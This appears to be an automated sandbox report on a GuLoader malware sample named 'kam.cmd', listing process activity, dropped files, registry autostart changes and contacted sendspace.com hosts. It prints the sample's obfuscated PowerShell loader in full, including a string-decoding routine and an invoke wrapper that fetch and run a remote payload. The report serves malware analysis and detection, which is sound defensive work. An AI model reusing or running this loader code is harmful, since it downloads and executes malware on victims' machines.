sjl.gtil.vlc.oirogelo,b linda isaclteleu:retsvmprvkebknyenebededlpulv,fottomasan,ob halsrkasini ,ermkledsaale.bonpredetdaa.y=ottin(regracraggemtragadsni,f dioe/p onec uth kono$indehtafsvaopterihdechiavantaacopian,malgd a stsbaut,bsh,rtebooketrgre,jafdeleraspenaktivimetabnlizarg cal )sagog ');delhed (afvarslingerne 't,ang$isvafgoptimlforlao eetsb.uperamellelintro:gal eu reobns.edemnavleounconn,aabeo,kadepmask ophilalitlliiad erznonnei maninunmo,g quil=afske$s vsngshutte pretn ileeun apr cumaa spagei,ettnkandiekan,i.heptasmisrepve,trl dagtioxalatpho o( road$ saltbzoodeateutorsatsek tabusunhos) nond ');$generaene=$unmonopolizing[0];$lommen= (afvarslingerne ' arti$ pre.g lystl sp,dodime,b spilaglatblcys,o:familgbaksglkate usuantmmisreehomotli,proivandlk henpetapet=to efnwinkeespearwstolt-dyreso stenbgadedjsogneecamemcmounttdek t ribstsmineryun.ros showtbassee virgmfili,. nonpnindp ee,strt impe.slap.wh.ldeetreckbsti,lcly kelnykalinona,erosennbangst');$lommen+=$mbelfabrikant[1];delhed ($lommen);delhed (afvarslingerne ',verc$a,rhug,affllalpinuhannem ind,eskattljustii datakb,rfoecorus.stin.hhage ecassiajointd nitheklunsr unmesskand[ over$ar.ehdskr.de job nab.m Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$elektroencefalograms = 1;$unvacuously='sub';$unvacuously+='strin';$unvacuously+='g';function afvarslingerne($corrodentia){$skrivepapiret=$corrodentia.length-$elektroencefalograms;for($parliaments178=5;$parliaments178 -lt $skrivepapiret;$parliaments178+=6){$mellemvejs+=$corrodentia.$unvacuously.invoke( $parliaments178, $elektroencefalograms);}$mellemvejs;}function delhed($jambos){. ($syresaltet254) ($jambos);}$fertilizing=afvarslingerne 'kodifm bundogangszaffecim.gnel kvinlbeboeai ter/cata 5m,del.uddat0.orur wi.d(tilbaw,eganida sondeprid bag,o,aubewthermstildm ekspan aldet mim. pejls1kopi.0mmesl. dia.0 ubb;sl,mb fami.wsprogikurvenv,sos6rema 4entsv; onse tarahx bo.u6kaval4 a,ls; tomk cig.rr appev satd:anthr1udmal2.ipho1mis,a. sed.0sedat),uder prov.gdemile sterckopibkoversou ykk/ f gh2gutta0 samm1fl nc0grund0skovs1nikke0srpr,1rubri hov.dfparahirimelr camoedottofulcerostrudxkreop/n.rco1okap,2klyng1refrn.u,elv0amula ';$deniably=afvarslingerne 's.zinupraisskittee,azumrunder-wittyasadd,gnick ehyposnf,nget c nd ';$generaene=afvarslingerne 'ra,cehmanubtconvatrainwpstddmshenre:garro/kn.ge/kerbew habiwacylawv.rso.colons humberebelnkonsodmungcstranspsten,aboaercchomse r in.creencdi,toob.ctemmili./ intrpadaylrpot.co dip,/ enlsdvandclcopyi/overtuhyn.eqbruti2phasc1endostembry8dokst ';$barks=afvarslingerne ' lini>kalku ';$syresaltet254=afvarslingerne 'skoldineshlen.umexkla p ';$stereomusik='goldede';$tohaandsbetjening = afvarslingerne 'klu perv.dicrejsehmultio pr,e samme% ennoa ennepfr.udpplanedhor eamooratwhinnazyzzy%bge,g\val dbt.ftsrregi,igrkerdrevolguds.uepaschwarcosach orrinstrd rej s opin.spotlhunbrua segmlwarmu sylle&klosr&trinu fng.ehalfscbaterhcentro nfre bunsetkono, ';delhed (afvarslingerne 'an ui$ sjl.gtil.vlc.oirogelo,b linda isaclteleu:retsvmprvkebknyenebededlpulv,fottomasan,ob halsrkasini ,ermkledsaale.bonpredetdaa.y=ottin(regracraggemtragadsni,f dioe/p onec uth kono$indehtafsvaopterihdechiavantaacopian,malgd a stsbaut,bsh,rtebooketrgre,jafdeleraspenaktivimetabnlizarg cal )sagog ');delhed (afvarslingerne 't,ang$isvafgoptimlforlao eetsb.uperamellelintro:gal eu reobns.edemnavleounconn,aabeo,kadepmask ophilalitlliiad erznonnei maninunmo,g quil=afske$s vsngshutte pretn ileeun apr cumaa spagei,ettnkandiekan,i.heptasmisrepve,trl dagtioxalatpho o( road$ saltbzoodeateutorsatsek tabusunhos) nond ');$generaene=$unmonopolizing[0];$lommen= (afvarslingerne ' arti$ pre.g lystl sp,dodime,b spilaglatblcys,o:familgbaksglkate usuantmmisreehomotli,proivandlk henpetapet=to efnwinkeespearwstolt-dyreso stenbgadedjsogneecamemcmounttdek t ribstsmineryun.ros showtbassee virgmfili,. nonpnindp ee,strt impe.slap.wh.ldeetreckbsti,lcly kelnykalinona,erosennbangst');$lommen+=$mbelfabrikant[1];delhed ($lommen);delhed (afvarslingerne ',verc$a,rhug,affllalpinuhannem ind,eskattljustii datakb,rfoecorus.stin.hhage ecassiajointd nitheklunsr unmesskand[ ove Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1446787 Sample: kam.cmd Startdate: 23/05/2024 Architecture: WINDOWS Score: 100 40 www.sendspace.com 2->40 42 fs13n2.sendspace.com 2->42 44 fs12n5.sendspace.com 2->44 56 Malicious sample detected (through community Yara rule) 2->56 58 Antivirus detection for URL or domain 2->58 60 Yara detected GuLoader 2->60 62 5 other signatures 2->62 9 cmd.exe 1 2->9         started        signatures3 process4 signatures5 64 Suspicious powershell command line found 9->64 66 Very long command line found 9->66 12 powershell.exe 14 23 9->12         started        16 conhost.exe 9->16         started        process6 dnsIp7 48 fs12n5.sendspace.com 69.31.136.53, 443, 49731 GTT-BACKBONEGTTDE United States 12->48 50 www.sendspace.com 104.21.28.80, 443, 49730, 50719 CLOUDFLARENETUS United States 12->50 74 Suspicious powershell command line found 12->74 76 Very long command line found 12->76 78 Found suspicious powershell code related to unpacking or dynamic code loading 12->78 18 powershell.exe 17 12->18         started        21 conhost.exe 12->21         started        23 cmd.exe 1 12->23         started        signatures8 process9 signatures10 52 Writes to foreign memory regions 18->52 54 Found suspicious powershell code related to unpacking or dynamic code loading 18->54 25 wab.exe 17 18->25         started        30 cmd.exe 1 18->30         started        process11 dnsIp12 46 fs13n2.sendspace.com 69.31.136.57, 443, 50720 GTT-BACKBONEGTTDE United States 25->46 32 C:\Windows\svchost.com, PE32 25->32 dropped 34 C:\Users\user\AppData\Local\Temp\chrome.exe, PE32 25->34 dropped 36 C:\ProgramData\...\VC_redist.x64.exe, PE32 25->36 dropped 38 149 other malicious files 25->38 dropped 68 Creates an undocumented autostart registry key 25->68 70 Drops executable to a common third party application directory 25->70 72 Infects executable files (exe, dll, sys, html) 25->72 file13 signatures14
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.21.28.80
 www.sendspace.com United States
13335 CLOUDFLARENETUS false
69.31.136.57
 fs13n2.sendspace.com United States
3257 GTT-BACKBONEGTTDE false
69.31.136.53
 fs12n5.sendspace.com United States
3257 GTT-BACKBONEGTTDE false

Contacted Domains

Name IP Active
fs13n2.sendspace.com 69.31.136.57 true
fs12n5.sendspace.com 69.31.136.53 true
www.sendspace.com 104.21.28.80 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://www.sendspace.com/pro/dl/uq21t8 false
  • Avira URL Cloud: safe
 unknown
https://www.sendspace.com/pro/dl/6v0noo false
  • Avira URL Cloud: safe
 unknown
https://fs12n5.sendspace.com/dlpro/49f996627c0399c13e97a7cb372f855b/664f94d2/uq21t8/Blokadens.msi false
  • Avira URL Cloud: safe
 unknown
https://fs13n2.sendspace.com/dlpro/15f7659e72d924eaa8d6602ae7a3a179/664f950b/6v0noo/nNznaMdneHnj42.bin false
  • Avira URL Cloud: safe
 unknown